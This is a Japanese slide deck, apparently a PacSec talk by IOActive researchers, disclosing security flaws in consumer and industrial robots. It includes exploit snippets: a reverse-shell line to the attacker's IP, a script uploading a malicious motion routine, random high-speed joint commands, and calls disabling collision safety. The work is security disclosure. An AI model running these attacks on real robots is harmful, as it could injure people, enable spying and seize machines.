SlideShare a Scribd company logo
1 of 51
Download to read offline
1	
Skynetが来る前に
ロボットをハックする
Cesar Cerrudo
CTO IOActive Labs (@cesarcer)
Lucas Apa
シニアセキュリティコンサルタント(@lucasapa)
ロボット技術入門
●  最近のロボット技術の導入
●  エコシステム、トポロジー、アーキテクチャ
●  事故と関連インシデント
2
主な家庭用ロボットとビジネス用ロボット
3	
ソフトバンクロボティクス:NAOとPepper
~20000
1億1,400慢ドルの投資
UBTECHロボティクス社:アルファ1Sとアルファ 2
1億ドルの投資
ROBOTIS社:OP2とTHORMANG3
主な家庭用ロボットとビジネス用ロボット
4	
ソフトバンクロボット:NAOとPepper
ATOM Z530 | Atom E3845 QUAD
1 GB RAM | 4 GB RAM
イーサネット, WiFi, BT
Linux 2.6.33-rt31-aldebaran-rt (Nao)
Linux 4.0 (Pepper)
Linux 3.10.72 (Androidタブレット) UBTECHロボティクス社:
アルファ1Sとアルファ 2
Linux 3.10.0 armv71
ROBOTIS社:OP2とTHORMANG3
Intel Atom N2600 / Ubuntu 12.04 LTS
主要な産業用協働ロボット
5	
ユニバーサルロボット社:UR3, UR5, UR10
Rethink Robotics社:Baxter と Sawyer
Linux 3.13.0-68
Java / C++
主要な産業用協働ロボット
6	
UR10 (ユニバーサルロボット社) Baxter (Rethink Robotics社)
モーレイ ロボティクス キッチン
(UR10アーム×2台)
DARPAのALIASロボット(UR3アーム)
主要なロボットコントローラ
7	
アスラテック社:いくつかのロボットは今回のテストの対象になった
V-Sido技術を使っている
ハックされたロボットの動き
8
ハックされたロボットの動き
9
研究のアプローチ
●  脅威のモデル化とリスク評価
●  脆弱性評価
●  リバースエンジニアリング戦略/戦略
1
0
大規模ネットワーク上のロボットを見つける
●  mDNS (マルチキャスト DNS)で簡単に
見つかる
•  NAO/Pepperのデフォルトホスト名
は "nao.local"
•  Baxter/Sawyerのデフォルトホスト名
はシリアル番号+ 「local」
例:“011303P0017.local” もしくは
<ロボット名>.local
•  ユニバーサルロボット社のUR3,
UR5, UR10 のデフォルトホスト名は
"ur.local"
	
1
1
認証/認可の脆弱性
●  Bluetooth, WiFi, イーサネット によるネットワーク接続
●  多くの保護されていないサービス (独自仕様・オープンソース)
○  5つの制御用TCPポートを通じてUniversal Robotsを動かす
○  V-Sido OS は認証が無い(ハード・ソフト インターフェース)
○  UBTech制御ポート
○  ROBOTIS RoboPlus プロトコルは認証が無い
○  Baxter/Sawyer SDK/RSDK シェルはカメラに接続、もしく、動かす
ためのもの
○  Pepper/NAO への攻撃は、ロボットに組み込まれたモジュール
のほとんどにアクセスできる(マイク、ボディーコントロール、
データベース、ネットワーク、カード、VPNシークレット、顔
認識モジュール)、ドキュメントに載っていない関数はリモー
トからコード実行させることができる
○  Pepper 管理用 Web コンソールでの認証バイパス
1
2
Pepper 管理コンソールにおける認証バイパス
1
3	
location ~* /libs/qimessaging/.*/qimessaging.js {
auth_pam "Secure Zone";
auth_pam_service_name "nginx";
}
http://192.168.1.105GET / 200
http://192.168.1.105GET /lib/requirejs/require.js?v=2.0.0 200
http://192.168.1.105GET /js/config.js?v=2.0.0 200
http://192.168.1.105GET /js/main.js?v=1.2.0 200
http://192.168.1.105GET /js/app.js?v=1.2.0 200
http://192.168.1.105GET /libs/qimessaging/1.0/qimessaging.js?v=1.2.0 401 Forbidden
実際の認証処理は
無い!
nginx config file
友人であるロボットを悪のロボットに変える
1
4	
●  人を傷つけるために Alpha2 をハックする
2 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
3 connected = sock.connect((HOST, PORT))
4 data = ""
5 print "[!] Sending Protocol HELLO"
7 sock.send("x34x12x12x00x00x00x01x00x00x00x92x01xabx91xa9
xe4xb8xadx73x73x73x73x73x73")
9 time.sleep(2)
10 print "[!] Requesting Available Actions"
12 sock.send("x34x12x07x00x00x00x01x00x00x00x92x03xa0")
13 sock.recv(1000)
14 print "[!] Uploading CHUCKY.UBX"
16 sock.send("x34x12x04x00x00x00x01x00x00x00")
(...)
27 print "[!] Sending Keep-Alive"
28 sock.send("x34x12x04x00x00x00x01x00x00x00")
29 sock.recv(1000)
31 print "[!] Launching CHUCKY"
32 sock.send("x34x12x0fx00x00x00x01x00x00x00x92x05xa8x91xa6Chucky")
33 sock.close()
34 print data
友人であるロボットを悪のロボットに変える
1
5	
●  人を傷つけるために Alpha2 をハックする
○  デモ
友人であるロボットを悪のロボットに変える
1
6	
●  人を傷つけるために Alpha2 をハックする
○  デモ
内部脅威としてのロボット:諜報活動の可能性
1
7	
2台のHDカメラ + 1台の3Dカメラ
(Pepper)
4台のマイク
(NAO)
企業秘密 顔認識 日立の EMIEW2
内部脅威としてのロボット:諜報活動の可能性
1
8	
●  NAO / Pepperをハックしてスパイカメラにする
内部脅威としてのロボット:諜報活動の可能性
1
9	
●  NAO / Pepperをハックしてスパイカメラにする
proxyVideo = ALProxy("ALVideoDevice", IP, PORT)
resolution = vision_definitions.kQVGA
colorSpace = vision_definitions.kRGBColorSpace
imgClient = proxyVideo.subscribe("_client", resolution, colorSpace, 5)
# Select camera.
proxyVideo.setParam(vision_definitions.kCameraSelectID, cameraID)
image = proxyVideo.getImageRemote(imgClient)
motionProxy = ALProxy("ALMotion", IP, PORT)
motionProxy.setStiffnesses("Head", 1.0)
# Example showing a slow, relative move of "HeadYaw".
# Calling this multiple times will move the head further.
names = "HeadYaw"
changes = 1
fractionMaxSpeed = 0.5
motionProxy.changeAngles(names, changes, fractionMaxSpeed)
ALVideoDevice.so
ALMotion.so
update video feed
内部脅威としてのロボット:諜報活動の可能性
2
0	
●  NAO / Pepperをハックしてスパイカメラにする
○  デモ
UBTech のスパイ活動?
2
1	
●  GPS座標をハードコードされた暗号 で
暗号化して送信 (Alpha 1S)
●  GPS座標を暗号せずに送信(Alpha 2)
●  写真自動的にクラウドと同期
●  IMEI と 通信 データを送信 (Mobile app)
●  全ての認識された音声データを送信 (ロー
カルネットワークのIPアドレス宛のみ)
●  ロボットはクラウドからコントロール可能
●  すべては平文で送信☺
人間の安全保護
●  自己衝突センサー
●  外部衝突(人間/物体)
●  責任・法的責任?
“衝突回避の目的は、ロボット、周囲への損害を避けること、そして、
何よりも人々を傷つけるのを避けることです。 このことは腕や台座
が物や人にぶつからないかをロボットの計量センサーで周囲をチェ
ックすることに適用されています。"	
2
2
ユニバーサルロボットの安全保護を無効にする
●  これらのロボットは人を傷つけられるか?
○  低速で動いている時の力は十分に頭蓋骨骨折を起こすこと
ができる。
●  設置に際しては「安全設定」を定義する。
●  力、運動量、速度、工具の向き、境界線などを制限する。すべ
ての設定には「安全なパスワード」が設定される
2
3	
安全装置としての I/O 安全装置としての平面
ユニバーサルロボットの安全保護を攻撃する
2
4	
1.  URダッシュボードサーバー上のリモートバージョンを 確認する。
$	nc	<remoteIP>	29999	
Connected:	Universal	Robots	Dashboard	Server	
PolyscopeVersion	←	command	
3.3.4.310	←	response	(version	disclosure)	
load	installation	notexist	←	command	
File	not	found:	/home/ur/ursys-3.3.4.310/GUI/notexist	←	
response	(base	folder	disclosure)
ユニバーサルロボットの安全保護を攻撃する
2
5	
2.  URのModbus TCPサービスにおけるスタックベース・バッファオーバーフ
ローの脆弱性を攻撃 。Modbus 読み書きの脆弱性(バイナリをrootで実
行) (ASLR/NX)。
arg1	=	"-c"	
arg2	=	"/bin/bash	-i	>&	/dev/tcp/<<myIPAddress>>/8981	0>&1"	
arg0	=	["/bin/bash",	arg1,	arg2]	
execve(*arg0[0],	*arg0,	0)
ユニバーサルロボットの安全保護を攻撃する
2
6
ユニバーサルロボットの安全保護を攻撃する
2
7
ユニバーサルロボットの安全保護を攻撃する
2
8	
3.  すべての安全確保のための一般制限値、ジョイントの制限、境界、
安全装置としてのI/O値を上書きするようにsafety.confを変更する。
4.  チェックサムの計算で衝突を強制し、新しいファイルをアップロ
ードする。設置者が現在のチェックサム値をハードウェアに注意
書きラベルの形で書いているのが一般的なベストプラクティスな
ので、これ利用してチェックサムを偽造する必要が有る。
5.  ロボットを再起動すると安全設定が新しいファイルによって更新
される。そして、プロセスは続く!
>>	python	-c	'	
import	subprocess,	time;		
time.sleep(25);		
subprocess.Popen(["sh	$$basefolder$$/
starturcontrol.sh"],	
shell=True	,close_fds=True)'	&n
ユニバーサルロボットの安全保護を攻撃する
2
9	
6.  新しいインストールファイルをロードする(新しい安全設定)。
7.  UR制御サービスの認証に関する問題を攻撃することで、ロボットを
任意の危険な方法で動かす。
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, 30002))
for x in xrange(50):
q = [random.uniform(-2*math.pi, 2*math.pi), 
random.uniform(-2*math.pi, 2*math.pi), 
random.uniform(-2*math.pi, 2*math.pi), 
random.uniform(-2*math.pi, 2*math.pi), 
random.uniform(-2*math.pi, 2*math.pi), 
random.uniform(-2*math.pi, 2*math.pi)] ← joint positions
a = random.uniform(1, 20) ← joint acceleration
v = random.uniform(1, 20) ← joint speed
payload = "movej("+ str(q) + ", a="+str(a)+", v="+str(v)+")" ← move joints
s.send(payload + "n")
print "[!] Sent", payload
time.sleep(1)
data = s.recv(1024)
s.close()
print("Received", repr(data))
攻撃デモ
3
0
攻撃デモ
3
1
Disabling Pepper/NAO Human Safety Settings (1/2)
●  It is possible to disable all external-collision avoidance
protections by changing the state of the ALMotion module
through the setExternalCollisionProtectionEnabled function.
○  NAO does not require user consent for disabling critical
reflexes
○  Pepper require user consent for disabling critical reflexes
(exploit Auth Bypass in Web Console)
3
2	
Pepper blind spots. Arm speed is reduced
when moving inside these zonesSecurity Distances NAO/Pepper
Disabling Pepper/NAO Human Safety Settings (2/2)
3
3	
"""
This exploit uses the setExternalCollisionProtectionEnabled method.
"""
# Get the service ALMotion.
motion_service = session.service("ALMotion")
# Disables "Move", "LArm" and "RArm" external anti collision
name = "All"
enable = False
motion_service.setExternalCollisionProtectionEnabled(name, enable)
(…)
Security protection can be disabled from the
vulnerable Pepper Web Console.
Disabling Baxter/Sawyer Human Safety Settings
3
4	
●  Arm joint mode: "Torque mode"
○  This control mode should be used with extreme caution,
since this control mode bypasses collision avoidance and
can result in potentially harmful motions.
○  To enable torque mode: publish a JointCommand message
to the joint_command topic for a given arm to set the arm
into the desired control mode and move it (mode 3):
	
$ rostopic pub /robot/limb/<side>/joint_command
baxter_core_msgs/JointCommand "{mode: 3, command: [0.0,
0.01, 0.0, 3.0, 2.55, -1.0, -2.07], names: ['left_w0', 'left_w1',
'left_w2', 'left_e0', 'left_e1', 'left_s0', 'left_s1']}" -r 100
○  Other ways to disable collision avoidance are also
possible
脆弱な研究フレームワーク:ROS
3
5	
●  最も広く使用されているオープンソースフレームワーク。
●  主要な目的は、ロボット工学の研究開発におけるコード
の再利用をサポートすること。
●  多くの 既知のセキュリティ問題
○  認証無し
○  暗号化無し
○  送信者確認無し
●  Ruffin White 氏による Secure ROS (実験的試み)
○  転送の暗号化、ネイティブTLSサポート
○  アクセス制御
○  AppArmorプロセスプロファイル
○  もう開発は行われていない
ROS: 研究 => 製品化
3
6	
MICO
NAV2
Schunk LWA 4P
JACO
HiroNXO
ERLE Plane
REEM
Manipulator
PR2
Pepper
3
7
物理攻撃 – 接続部分を攻撃
3
8	
Baxter and Sawyer はLANポートが
台座に露出している。
ポートからはロボットネットワーク
サービスもしくはModbus TCP機能
への接続が可能。
物理攻撃 – 接続部分を攻撃
3
9	
ユニバーサルロボット社のコントローラ は
USBインターフェースに
ワイヤレスマウス・キーボードを接続可能
物理攻撃 – 接続部分を攻撃
4
0	
Pepper と NAO の頭のプラスチック蓋
は簡単に外すことができLANポートに
アクセスできる。LANポートからロボ
ットねとワークサービスに接続できる。
物理攻撃 – 安全でないストレージ
4
1	
●  リムーバブル・ストレージRemovable storage
○  Alpha 2 はロボットの動きと WiFi パスワードを保存
	generic:/sdcard/ubtech/temp/image # ls -lha
-rw-rw---- 1 root sdcard_rw 10K 2016-11-02 01:10 -943417681 <--- QR
code
drwxrwx--x 2 root sdcard_rw 4.0K 2016-11-02 01:21 .
drwxrwx--x 3 root sdcard_rw 4.0K 2016-11-02 00:40 ..
-rw-rw---- 1 root sdcard_rw 49 2016-11-02 01:21 819289450 <--- QR
code
$platform-tools/adb pull /sdcard/ubtech/temp/image/-943417681
すべてを支配するための1つのハッキング
4
2	
●  ベンダーのクラウドへの攻撃の可能性
○  クラウドからはベンダーがロボットを制
御したりアプリケーションを配信したり
できる。
○  強力なクラタスロボット軍団!
	
Web コントローラがペアリングキーをベンダーに送信
ロボットを殺す
4
3	
private void startSendBin()
{
((AlphaApplication)this.mContext.getApplicationContext()).
getBlueToothManager().addBlueToothInteraction(this.mSe
ndListener);
[..........]
((AlphaApplication)this.mContext.getApplicationContext()).
getBlueToothManager().sendCommand(((AlphaApplication
)this.mContext.getApplicationContext()).getCurrentBluetoot
h().getAddress(), (byte)20, arrayOfByte,
arrayOfByte.length, true);
}
}
●  遠隔操作でロボットを殺す(UBTech / SoftBankの全ての機種)
○  悪質なファームウェアのアップグレード。ファイルの整合性は検証
されない。
○  空中からのアップグレード (Bluetooth/WiFi)
○  マニュアルに無い機能!
○  向上に戻す? ファクトリ・リセット? いくらかかる?
	
Alpha リモート・キル
Pepper/NAOの	ALSystem モジュ
ールはリモートから呼び出して
factoryReset と upgrade (引
数:imageUrl, checksum (nullに
できる)) を出力可能
クラウドサービス - アカウントのハイジャック
4
4	
●  クラウドサービスはロボットを制御
○  アップデートを行い、アプリケーションをインストール・除去
○  カスタマーサポートに連絡し、ファームウェアのイメージを入手
○  クラウドアカウントをロボットに紐づけ・紐づけ解除
署名されていない更新
4
5	
●  ファームウェア/アプリケーションの完全性は無い
○  ROBOTIS-OP2 における署名無しのファームウェアイメージ
○  署名されていないUBTech Alpha (ロボットとアプリケーション
両方) APKによるアップデート
○  ソフトバンクNAO/Pepper におけるNULLのチェックサム
	
printf("nDownloading Bytesum:%2Xn", bytesum);
...
/*--- end download ---*/
r = write(fd, "go 8023000", 10);
r = write(fd, "r", 1);
int wait_count = 0;
char last_char = 0;
while(1)
{
if(kbhit())
{
TxCh = _getch();
if(TxCh == 0x1b)
break;
else if(TxCh == 127) // backspace
TxCh = 0x08; // replace backspace value
r = write(fd, &TxCh, 1); ← writes directly
}
Alpha アプリケーション
アップデート
ROBOTIS OP2 RoboPlus
今日のロボットにおけるセキュリティ問題
●  見つかったこと
○  安全でない通信
○  メモリ破損の問題
○  リモートコード実行の脆弱性
○  ファイル整合性の問題
○  認証の問題
○  認証機能の欠落
○  弱い暗号化
○  ファームウェアのアップデート/アップグレードの問題
○  プライバシー問題
○  文書化されていない機能 (リモートコード実行可能などの脆弱性
も有る)
○  弱いデフォルト設定 (SSHシークレットの共有、パスワード)
○  脆弱なオープンソースのロボットフレームワークとライブラリ
	
4
6
ハックされたロボットがもたらすもの
●  家庭で
○  プライバシー問題, 人的・物的損害
●  ビジネスおよび産業において
○  産業スパイ, 人的・物的損害, 企業・ビジネスネットワーク
への侵入
●  医療および軍事において
○  人間への直接の脅威
4
7
ベンダーの対応
“大変興味深い発見と思う。我々が何か
をなさねばならない対象だ :-)”
(未だ修正無し)
“すべては次のリリースで修正される。”
… 3か月後… “修正不可能だ。” .
(未だ修正無し)
“ありがとう!よくわかった!”
”開発者に責任を持ってコーディングす
るように働きかけ、不適切なロボットの
行動をやめさせる!”
4
8	
(Nfi(未だ修正無し)
xes yet)
世界のロボットセキュリティの向上
●  開発の最初からセキュリティ
●  工場出荷時の復元
●  サプライチェーンの安全確保
●  セキュア・バイ・デフォルト
●  教育
●  脆弱性の開示への対応
●  マーケティング投資を減らしてサイバーセキュリティに
投資 !!!!
4
9
結論
●  ロボットは素晴らしい
●  ロボットは安全ではない
●  人間の安全確保機能が無効化できる
○  現在のロボットは十分な安全を提供できない
●  ロボットは人を殺したり傷つけたりできるし、物も損傷できる
●  研究プロジェクトはセキュリティを追加せずに製品化に移行
●  マーケティングが勝っている
●  これを直ちに解決する必要が有る
5
0
終了
ありがとうございました。
ccerrudo@ioactive.com (@cesarcer)
lucas.apa@ioactive.com (@lucasapa)
5
1

More Related Content

What's hot

Exploring the x64
Exploring the x64Exploring the x64
Exploring the x64FFRI, Inc.
 
システムコールフックを使用した攻撃検出
システムコールフックを使用した攻撃検出システムコールフックを使用した攻撃検出
システムコールフックを使用した攻撃検出FFRI, Inc.
 
Miniseminar stm32 l4-iot-kit-updated-101018
Miniseminar stm32 l4-iot-kit-updated-101018Miniseminar stm32 l4-iot-kit-updated-101018
Miniseminar stm32 l4-iot-kit-updated-101018hideyukiaraki
 
Webエンジニアのためのスマートホームハック ~ Node.js で家電とArduinoを操作 ~
Webエンジニアのためのスマートホームハック ~ Node.js で家電とArduinoを操作 ~Webエンジニアのためのスマートホームハック ~ Node.js で家電とArduinoを操作 ~
Webエンジニアのためのスマートホームハック ~ Node.js で家電とArduinoを操作 ~Futomi Hatano
 
続・Webエンジニアのためのスマートホームハック ~ Node.js で IoT プロトコルハック ~
続・Webエンジニアのためのスマートホームハック ~ Node.js で IoT プロトコルハック ~続・Webエンジニアのためのスマートホームハック ~ Node.js で IoT プロトコルハック ~
続・Webエンジニアのためのスマートホームハック ~ Node.js で IoT プロトコルハック ~Futomi Hatano
 
ESP8266をはじめよう
ESP8266をはじめようESP8266をはじめよう
ESP8266をはじめようKei Yoshimura
 
03 後期勉強会一年の部【川合】
03 後期勉強会一年の部【川合】03 後期勉強会一年の部【川合】
03 後期勉強会一年の部【川合】yu-Linux
 
Azureの上におとりを置いて、世界中から攻撃される様子を観察した話
Azureの上におとりを置いて、世界中から攻撃される様子を観察した話Azureの上におとりを置いて、世界中から攻撃される様子を観察した話
Azureの上におとりを置いて、世界中から攻撃される様子を観察した話Ryuki Yoshimatsu
 
Bluetoothl-Low-Energy入門講座-part1
Bluetoothl-Low-Energy入門講座-part1Bluetoothl-Low-Energy入門講座-part1
Bluetoothl-Low-Energy入門講座-part1edy555
 
AWS GreengrassによるLチカとAIスピーカーによるBAS制御の実証実験
AWS GreengrassによるLチカとAIスピーカーによるBAS制御の実証実験AWS GreengrassによるLチカとAIスピーカーによるBAS制御の実証実験
AWS GreengrassによるLチカとAIスピーカーによるBAS制御の実証実験TomohisaYamazoe
 
ワンコインでIot入門 第二章
ワンコインでIot入門 第二章ワンコインでIot入門 第二章
ワンコインでIot入門 第二章Makoto Takahashi
 

What's hot (13)

Exploring the x64
Exploring the x64Exploring the x64
Exploring the x64
 
システムコールフックを使用した攻撃検出
システムコールフックを使用した攻撃検出システムコールフックを使用した攻撃検出
システムコールフックを使用した攻撃検出
 
Miniseminar stm32 l4-iot-kit-updated-101018
Miniseminar stm32 l4-iot-kit-updated-101018Miniseminar stm32 l4-iot-kit-updated-101018
Miniseminar stm32 l4-iot-kit-updated-101018
 
Cisco ios
Cisco iosCisco ios
Cisco ios
 
Cisco ios
Cisco iosCisco ios
Cisco ios
 
Webエンジニアのためのスマートホームハック ~ Node.js で家電とArduinoを操作 ~
Webエンジニアのためのスマートホームハック ~ Node.js で家電とArduinoを操作 ~Webエンジニアのためのスマートホームハック ~ Node.js で家電とArduinoを操作 ~
Webエンジニアのためのスマートホームハック ~ Node.js で家電とArduinoを操作 ~
 
続・Webエンジニアのためのスマートホームハック ~ Node.js で IoT プロトコルハック ~
続・Webエンジニアのためのスマートホームハック ~ Node.js で IoT プロトコルハック ~続・Webエンジニアのためのスマートホームハック ~ Node.js で IoT プロトコルハック ~
続・Webエンジニアのためのスマートホームハック ~ Node.js で IoT プロトコルハック ~
 
ESP8266をはじめよう
ESP8266をはじめようESP8266をはじめよう
ESP8266をはじめよう
 
03 後期勉強会一年の部【川合】
03 後期勉強会一年の部【川合】03 後期勉強会一年の部【川合】
03 後期勉強会一年の部【川合】
 
Azureの上におとりを置いて、世界中から攻撃される様子を観察した話
Azureの上におとりを置いて、世界中から攻撃される様子を観察した話Azureの上におとりを置いて、世界中から攻撃される様子を観察した話
Azureの上におとりを置いて、世界中から攻撃される様子を観察した話
 
Bluetoothl-Low-Energy入門講座-part1
Bluetoothl-Low-Energy入門講座-part1Bluetoothl-Low-Energy入門講座-part1
Bluetoothl-Low-Energy入門講座-part1
 
AWS GreengrassによるLチカとAIスピーカーによるBAS制御の実証実験
AWS GreengrassによるLチカとAIスピーカーによるBAS制御の実証実験AWS GreengrassによるLチカとAIスピーカーによるBAS制御の実証実験
AWS GreengrassによるLチカとAIスピーカーによるBAS制御の実証実験
 
ワンコインでIot入門 第二章
ワンコインでIot入門 第二章ワンコインでIot入門 第二章
ワンコインでIot入門 第二章
 

Similar to Lucas apa pacsec_slides_jp-final

インメモリーで超高速処理を実現する場合のカギ
インメモリーで超高速処理を実現する場合のカギインメモリーで超高速処理を実現する場合のカギ
インメモリーで超高速処理を実現する場合のカギMasaki Yamakawa
 
AIスピーカーとオープンネットワーク機器LonWorks・EnOcean・DALI 接続実証実験
AIスピーカーとオープンネットワーク機器LonWorks・EnOcean・DALI 接続実証実験AIスピーカーとオープンネットワーク機器LonWorks・EnOcean・DALI 接続実証実験
AIスピーカーとオープンネットワーク機器LonWorks・EnOcean・DALI 接続実証実験TomohisaYamazoe
 
SORACOM Technology Camp 2018 | A4. 明日からできるLPWA開発の基礎
SORACOM Technology Camp 2018 | A4. 明日からできるLPWA開発の基礎SORACOM Technology Camp 2018 | A4. 明日からできるLPWA開発の基礎
SORACOM Technology Camp 2018 | A4. 明日からできるLPWA開発の基礎SORACOM,INC
 
「Turtlebot3の紹介」 ROS Japan UG #10 勉強会
「Turtlebot3の紹介」 ROS Japan UG #10 勉強会「Turtlebot3の紹介」 ROS Japan UG #10 勉強会
「Turtlebot3の紹介」 ROS Japan UG #10 勉強会ROBOTIS Japan
 
SORACOM Technology Camp 2018 | A2. IoTプロトタイプデバイス製作入門 ~セルラー通信デバイス編~
SORACOM Technology Camp 2018 | A2. IoTプロトタイプデバイス製作入門 ~セルラー通信デバイス編~SORACOM Technology Camp 2018 | A2. IoTプロトタイプデバイス製作入門 ~セルラー通信デバイス編~
SORACOM Technology Camp 2018 | A2. IoTプロトタイプデバイス製作入門 ~セルラー通信デバイス編~SORACOM,INC
 
201104016 osc2011 kobe
201104016 osc2011 kobe201104016 osc2011 kobe
201104016 osc2011 kobeYamauchi isamu
 
131106 01 i-rex2013
131106 01 i-rex2013131106 01 i-rex2013
131106 01 i-rex2013openrtm
 
無線LANでロボットを動かす話
無線LANでロボットを動かす話無線LANでロボットを動かす話
無線LANでロボットを動かす話Hisaya Okada
 
MeeGo Seminar Winter Porting 20101209
MeeGo Seminar Winter Porting 20101209MeeGo Seminar Winter Porting 20101209
MeeGo Seminar Winter Porting 20101209Mitz Amano
 
SigfoxではじめるIoT勉強会
SigfoxではじめるIoT勉強会SigfoxではじめるIoT勉強会
SigfoxではじめるIoT勉強会Gaku Hibi
 
Lagopusで試すFirewall
Lagopusで試すFirewallLagopusで試すFirewall
Lagopusで試すFirewallTomoya Hibi
 
無線LANでロボットを動かす話
無線LANでロボットを動かす話無線LANでロボットを動かす話
無線LANでロボットを動かす話Hisaya Okada
 
Androidでロボットを動かそう・すまべん関西201003
Androidでロボットを動かそう・すまべん関西201003Androidでロボットを動かそう・すまべん関西201003
Androidでロボットを動かそう・すまべん関西201003cat sin
 
RouterBOARD with OpenFlow
RouterBOARD with OpenFlowRouterBOARD with OpenFlow
RouterBOARD with OpenFlowToshiki Tsuboi
 
SEAndroid -AndroidのアーキテクチャとSE化について-
SEAndroid -AndroidのアーキテクチャとSE化について-SEAndroid -AndroidのアーキテクチャとSE化について-
SEAndroid -AndroidのアーキテクチャとSE化について-Hiromu Yakura
 
Lagopusで試すFW
Lagopusで試すFWLagopusで試すFW
Lagopusで試すFWTomoya Hibi
 
ハードウェアによる仮想化支援機能を利用したハイパバイザーIPS
ハードウェアによる仮想化支援機能を利用したハイパバイザーIPSハードウェアによる仮想化支援機能を利用したハイパバイザーIPS
ハードウェアによる仮想化支援機能を利用したハイパバイザーIPSFFRI, Inc.
 

Similar to Lucas apa pacsec_slides_jp-final (20)

インメモリーで超高速処理を実現する場合のカギ
インメモリーで超高速処理を実現する場合のカギインメモリーで超高速処理を実現する場合のカギ
インメモリーで超高速処理を実現する場合のカギ
 
Mt basic as-os_on_danbot
Mt basic as-os_on_danbotMt basic as-os_on_danbot
Mt basic as-os_on_danbot
 
AIスピーカーとオープンネットワーク機器LonWorks・EnOcean・DALI 接続実証実験
AIスピーカーとオープンネットワーク機器LonWorks・EnOcean・DALI 接続実証実験AIスピーカーとオープンネットワーク機器LonWorks・EnOcean・DALI 接続実証実験
AIスピーカーとオープンネットワーク機器LonWorks・EnOcean・DALI 接続実証実験
 
SORACOM Technology Camp 2018 | A4. 明日からできるLPWA開発の基礎
SORACOM Technology Camp 2018 | A4. 明日からできるLPWA開発の基礎SORACOM Technology Camp 2018 | A4. 明日からできるLPWA開発の基礎
SORACOM Technology Camp 2018 | A4. 明日からできるLPWA開発の基礎
 
「Turtlebot3の紹介」 ROS Japan UG #10 勉強会
「Turtlebot3の紹介」 ROS Japan UG #10 勉強会「Turtlebot3の紹介」 ROS Japan UG #10 勉強会
「Turtlebot3の紹介」 ROS Japan UG #10 勉強会
 
141125CITBrains
141125CITBrains141125CITBrains
141125CITBrains
 
SORACOM Technology Camp 2018 | A2. IoTプロトタイプデバイス製作入門 ~セルラー通信デバイス編~
SORACOM Technology Camp 2018 | A2. IoTプロトタイプデバイス製作入門 ~セルラー通信デバイス編~SORACOM Technology Camp 2018 | A2. IoTプロトタイプデバイス製作入門 ~セルラー通信デバイス編~
SORACOM Technology Camp 2018 | A2. IoTプロトタイプデバイス製作入門 ~セルラー通信デバイス編~
 
201104016 osc2011 kobe
201104016 osc2011 kobe201104016 osc2011 kobe
201104016 osc2011 kobe
 
131106 01 i-rex2013
131106 01 i-rex2013131106 01 i-rex2013
131106 01 i-rex2013
 
無線LANでロボットを動かす話
無線LANでロボットを動かす話無線LANでロボットを動かす話
無線LANでロボットを動かす話
 
MeeGo Seminar Winter Porting 20101209
MeeGo Seminar Winter Porting 20101209MeeGo Seminar Winter Porting 20101209
MeeGo Seminar Winter Porting 20101209
 
SigfoxではじめるIoT勉強会
SigfoxではじめるIoT勉強会SigfoxではじめるIoT勉強会
SigfoxではじめるIoT勉強会
 
Kiso sekkei 01rev03
Kiso sekkei 01rev03Kiso sekkei 01rev03
Kiso sekkei 01rev03
 
Lagopusで試すFirewall
Lagopusで試すFirewallLagopusで試すFirewall
Lagopusで試すFirewall
 
無線LANでロボットを動かす話
無線LANでロボットを動かす話無線LANでロボットを動かす話
無線LANでロボットを動かす話
 
Androidでロボットを動かそう・すまべん関西201003
Androidでロボットを動かそう・すまべん関西201003Androidでロボットを動かそう・すまべん関西201003
Androidでロボットを動かそう・すまべん関西201003
 
RouterBOARD with OpenFlow
RouterBOARD with OpenFlowRouterBOARD with OpenFlow
RouterBOARD with OpenFlow
 
SEAndroid -AndroidのアーキテクチャとSE化について-
SEAndroid -AndroidのアーキテクチャとSE化について-SEAndroid -AndroidのアーキテクチャとSE化について-
SEAndroid -AndroidのアーキテクチャとSE化について-
 
Lagopusで試すFW
Lagopusで試すFWLagopusで試すFW
Lagopusで試すFW
 
ハードウェアによる仮想化支援機能を利用したハイパバイザーIPS
ハードウェアによる仮想化支援機能を利用したハイパバイザーIPSハードウェアによる仮想化支援機能を利用したハイパバイザーIPS
ハードウェアによる仮想化支援機能を利用したハイパバイザーIPS
 

More from PacSecJP

Kavya racharla ndh-naropanth_fin_jp-final
Kavya racharla ndh-naropanth_fin_jp-finalKavya racharla ndh-naropanth_fin_jp-final
Kavya racharla ndh-naropanth_fin_jp-finalPacSecJP
 
Ryder robertson security-considerations_in_the_supply_chain_2017.11.02
Ryder robertson security-considerations_in_the_supply_chain_2017.11.02Ryder robertson security-considerations_in_the_supply_chain_2017.11.02
Ryder robertson security-considerations_in_the_supply_chain_2017.11.02PacSecJP
 
Ryder robertson pac-sec skeleton 2017_jp
Ryder robertson pac-sec skeleton 2017_jpRyder robertson pac-sec skeleton 2017_jp
Ryder robertson pac-sec skeleton 2017_jpPacSecJP
 
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final-j
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final-jYuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final-j
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final-jPacSecJP
 
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_finalYuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_final
Yuki chen from_out_of_memory_to_remote_code_execution_pac_sec2017_finalPacSecJP
 
Rouault imbert view_alpc_rpc_pacsec_jp
Rouault imbert view_alpc_rpc_pacsec_jpRouault imbert view_alpc_rpc_pacsec_jp
Rouault imbert view_alpc_rpc_pacsec_jpPacSecJP
 
Rouault imbert alpc_rpc_pacsec
Rouault imbert alpc_rpc_pacsecRouault imbert alpc_rpc_pacsec
Rouault imbert alpc_rpc_pacsecPacSecJP
 
Di shen pacsec_jp-final
Di shen pacsec_jp-finalDi shen pacsec_jp-final
Di shen pacsec_jp-finalPacSecJP
 
Di shen pacsec_final
Di shen pacsec_finalDi shen pacsec_final
Di shen pacsec_finalPacSecJP
 
Anıl kurmuş pacsec3-ja
Anıl kurmuş pacsec3-jaAnıl kurmuş pacsec3-ja
Anıl kurmuş pacsec3-jaPacSecJP
 
Anıl kurmuş pacsec3
Anıl kurmuş pacsec3Anıl kurmuş pacsec3
Anıl kurmuş pacsec3PacSecJP
 
Ahn pacsec2017 key-recovery_attacks_against_commercial_white-box_cryptography...
